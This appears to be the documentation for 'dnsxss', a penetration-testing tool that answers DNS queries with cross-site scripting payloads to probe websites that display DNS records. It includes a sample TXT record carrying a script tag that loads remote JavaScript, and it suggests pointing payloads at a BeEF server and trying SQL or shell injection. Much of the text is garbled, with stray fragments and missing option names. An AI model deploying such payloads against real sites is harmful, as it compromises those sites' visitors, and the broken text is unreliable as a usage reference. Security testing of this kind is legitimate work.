This tool is designed for testing sites that display dns records against
cross-site scripting attacks. I discovered that the majority of servers that
print, for example, MX records for a given domain don't filter the responses
servers for .
before displaying them. This allows an attacker to return arbitrary text,
, to all
including html characters, to all replies. Requests that don't allow
, and ,
text, like A and AAAA, are replied to with localhost (127.0.0.1
This tool assumes that the authoritative record for a DNS server points to
you. You can check if you do either by running 'dnsxss --test <domain>' or
by using the 'dnstest' program directly.
Although there isn't really an avenue for doing a cross-site scripting
attack against A or AAAA requests, they still return a valid result. Both
return localhost by default, but can be configured to return any address
you want, making this, technically, a legitimate (but limited) DNS server.
can be .
Technically, there's nothing stopping this tool from attempting other
attacks, such as SQL injection, but I haven't tried testing those yet.
, such as injection
dnsxss is designed to send back malicious responses to DNS queries in
order to test DNS lookup servers for common classes of vulnerabilities.
MX, CNAME, NS, and TEXT requests, in the hopes that the DNS lookup will be
displayed in a browser.
When I originally wrote this, I tested it on a handful of Internet sites.
Every one of them was vulnerable.
I haven't tried testing other vulnerabilities, like SQL injection or
shell injection, but I suspect that this is a great attack vector for
those and other vulnerabilities, because people don't realize that malicious
traffic can be returned.
./dnsxss [-t <test string>]
The address sent back to the user when an A request is made. Can be used
to disguise this as a legitimate DNS server. Default: 127.0.0.1.
The address sent back to the user when an AAAA (IPv6) request is made. Can
be used to disguise this as a legitimate DNS server. Default: ::1.
The domain to put after the test string. It should be the same as the
one that points to your host.
The string containing the HTML characters, that will ultimately test for
the cross-site scripting vulnerability. Ultimately, this can contain any
type of attack, such as sql-injection. One thing to note is that DNS
generally seems to filter certain characters; in my testing, anything with
an ASCII code of 0x20 (Space) or lower was replaced with an escaped
/xxx, and brackets had a backslash added before them.
Note that unless a TEXT record is requested, spaces are replaced with
slashes ('/'), which work in Firefox but not IE.
By default, spaces in the payload are replaced with slashes ('/') because
the DNS protocol doesn't like spaces. Use this flag to bypass that
Test to see if we are the authoritative nameserver for the given domain.
The username to use when dropping privileges. Default: nobody.
-s --source <address>
The local address to bind to. Default: any (0.0.0.0)
-p --port <port>
The local port to listen on. I don't recommend changing this.
Running this program without arguments returns a pretty typical cross-site
$ dig @localhost -t TXT test
;; ANSWER SECTION:
test. 1 IN TXT "<script src='http://www.skullsecurity.org/test-js.js'></script>.test"
This will display a messagebox on the user's screen alerting them to the
issue. You can change the payload using the --payload argument and point
it at, for example, a BeEF server.
Authoritative DNS server
Many functions of this tool require you to be the authoritative nameserver
for a domain. This typically costs money, but is fairly cheap and has a lot
of benefits. If you aren't sure whether or not you're the authority, you
can use the --test argument to this program, or you can directly run the
dnsxss program, also included.